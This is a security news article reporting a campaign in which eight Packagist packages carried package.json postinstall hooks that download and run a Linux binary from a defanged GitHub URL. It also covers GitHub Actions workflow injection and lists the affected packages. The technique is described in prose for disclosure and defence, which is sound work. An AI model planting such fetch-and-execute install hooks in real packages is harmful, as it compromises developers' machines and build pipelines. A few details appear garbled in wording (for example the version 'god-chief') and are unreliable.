A new “coordinated” supply chain attack campaign has affected eight packages packageist It contains malicious code designed to run Linux binaries obtained from GitHub release URLs.
“Although the affected packages were all Composer packages, the malicious code was not added to composer.json,” Socket said. “Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling with PHP code.”
This makes “cross-ecosystem placement” activity different because developers and security teams scanning PHP dependencies can focus only on Composer-related metadata, while leaving out the package.json lifecycle hooks bundled within the package. The malicious versions have since been removed from Packagist.
Analysis of the packages revealed that their upstream repositories have been modified to include a postinstall script that attempts to download Linux binaries from a GitHub release URL (“github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f”), save it in the “/tmp/.sshd” folder, change its permissions using “chmod” to give execution permissions to all users, and run it in the background.
The names of the packages and their respective affected versions are listed below –
- moritz-sauer-13/silverstripe-cms-theme (dev-master)
- crosiersource/crosierlib-base (dev-master)
- devdojo/wave (dev-main)
- Devdojo/Genesis (Dev-Main)
- Katanaui/Katana (god-chief)
- elitedevsquad/sidecar-laravel(3.x-dev)
- r2luna/brain (dev-main)
- baskarcm/tzi-chat-ui (dev-main)
Socket.org’s investigation found references to the same payload in 777 files in GitHub, suggesting it may be part of a broader campaign. In at least two instances, it was added to the GitHub workflow. However, it is not currently known how many of these correspond to different commits, forks, duplicate package artifacts, or cached references.
“This suggests that the attacker was not relying on a single execution mechanism. In package artifacts, the payload was triggered through a package.json postinstall script,” the application security firm said. “In the workflow files, it was deployed to run during GitHub Actions jobs.”
Furthermore, the exact nature of the payload downloaded from GitHub is unclear, as the GitHub account associated with hosting the repository is no longer available. The choice of the name “gvfsd-network” for the malware is also notable, as it refers to the GNOME Virtual File System (GVfs) daemon that is responsible for managing and browsing network shares.
“Even without the second-stage binary, this is enough to guarantee blocking the malicious installer,” Socket said. “It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running downloaded binaries in the background.”
